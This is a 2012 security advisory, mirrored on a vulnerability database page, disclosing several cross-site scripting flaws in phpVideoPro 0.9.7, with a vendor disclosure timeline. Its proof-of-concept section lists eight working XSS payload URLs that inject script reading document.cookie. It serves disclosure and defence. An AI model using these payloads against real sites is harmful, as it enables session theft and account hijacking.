Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:27582
HistoryJan 21, 2012 - 12:00 a.m.

phpVideoPro Multiple XSS vulnerabilities

2012-01-2100:00:00
vulners.com
23

Advisory: phpVideoPro Multiple XSS vulnerabilities
Advisory ID: SSCHADV2011-041
Author: Stefan Schurtz
Affected Software: Successfully tested on phpVideoPro 0.9.7
Vendor URL: http://sourceforge.net/projects/phpvideopro/
Vendor Status: fix in the latest development code

==========================
Vulnerability Description

phpVideoPro 0.9.7 is prone to multiple XSS vulnerabilities

==================
PoC-Exploit

// XSS

http://[target]/phpvideopro-0.9.7/help/index.php?topic='"</script><script>alert(document.cookie)</script>
http://[target]/phpvideopro-0.9.7/login/"><script>alert(document.cookie)</script><"
http://[target]/phpvideopro-0.9.7/configure.php/"><script>alert(document.cookie)</script><"
http://[target]/phpvideopro-0.9.7/medialist.php/"><script>alert(document.cookie)</script><"
http://[target]/phpvideopro-0.9.7/setfilter.php/"><script>alert(document.cookie)</script><"
http://[target]/phpvideopro-0.9.7/search.php/"><script>alert(document.cookie)</script><"
http://[target]/phpvideopro-0.9.7/listgen.php/"><script>alert(document.cookie)</script><"
http://[target]/phpvideopro-0.9.7/label.php/"><script>alert(document.cookie)</script><"

=========
Solution

====================
Disclosure Timeline

26-Dec-2011 - vendor informed
27-Dec-2011 - vendor feedback & fix in the latest development code

========
Credits

Vulnerabilities found and advisory written by Stefan Schurtz.

===========
References

http://www.darksecurity.de/advisories/SSCHADV2011-041.tx